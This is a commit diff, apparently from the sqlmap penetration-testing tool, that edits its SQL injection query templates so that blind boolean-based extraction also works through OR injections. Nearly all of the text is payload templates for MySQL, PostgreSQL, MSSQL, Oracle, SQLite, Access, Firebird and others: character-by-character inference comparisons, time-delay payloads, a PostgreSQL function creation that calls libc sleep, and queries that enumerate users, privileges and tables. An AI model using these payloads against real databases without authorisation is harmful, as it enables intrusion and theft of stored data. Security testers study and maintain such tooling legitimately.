Minor code refactoring and finally make exploitation work also on OR boolean-based injections

2026-01-22 06:09:02 +00:00 · 2010-12-05 11:25:44 +00:00
parent 7a5cd3b35f
commit 41e1b95c6c
3 changed files with 56 additions and 20 deletions
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,7 @@
        <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
        <substring query="MID((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
+        <inference query="ORD(MID((%s), %d, 1)) > %d"/>
        <banner query="VERSION()"/>
        <current_user query="CURRENT_USER()"/>
        <current_db query="DATABASE()"/>
@@ -96,7 +96,7 @@
        <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
        <substring query="SUBSTR((%s)::text, %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
        <banner query="SELECT VERSION()"/>
        <current_user query="SELECT CURRENT_USER"/>
        <current_db query="SELECT CURRENT_DATABASE()"/>
@@ -162,7 +162,7 @@
        <timedelay query="WAITFOR DELAY '0:0:%d'"/>
        <substring query="SUBSTRING((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
        <banner query="SELECT @@VERSION"/>
        <current_user query="SELECT SYSTEM_USER"/>
        <current_db query="SELECT DB_NAME()"/>
@@ -226,7 +226,7 @@
        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
-        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTR((%s), %d, 1)) > %d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
        <current_user query="SELECT USER FROM DUAL"/>
        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
@@ -306,7 +306,7 @@
        <timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
        <banner query="SELECT SQLITE_VERSION()"/>
        <current_user/>
        <current_db/>
@@ -353,7 +353,7 @@
        <banner/>
        <current_user query="SELECT CURRENTUSER()"/>
        <current_db/>
-        <inference query="AND ASC(MID((%s), %d, 1)) > %d"/>
+        <inference query="ASC(MID((%s), %d, 1)) > %d"/>
        <is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
        <dbs/>
        <tables>
@@ -389,7 +389,7 @@
            <inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
        </users>
-        <inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
+        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
        <is_dba query="CURRENT_USER='SYSDBA'"/>
        <tables>
            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@@ -432,7 +432,7 @@
        <current_db query="SELECT DATABASE() FROM DUAL"/>
        <order query="ORDER BY %s ASC"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
        <delimiter query=","/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <users>
@@ -473,7 +473,7 @@
        <timedelay query="WAITFOR DELAY '0:0:%d'"/>
        <substring query="SUBSTRING((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
+        <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
        <banner query="SELECT @@VERSION"/>
        <current_user query="SELECT SUSER_NAME()"/>
        <current_db query="SELECT DB_NAME()"/>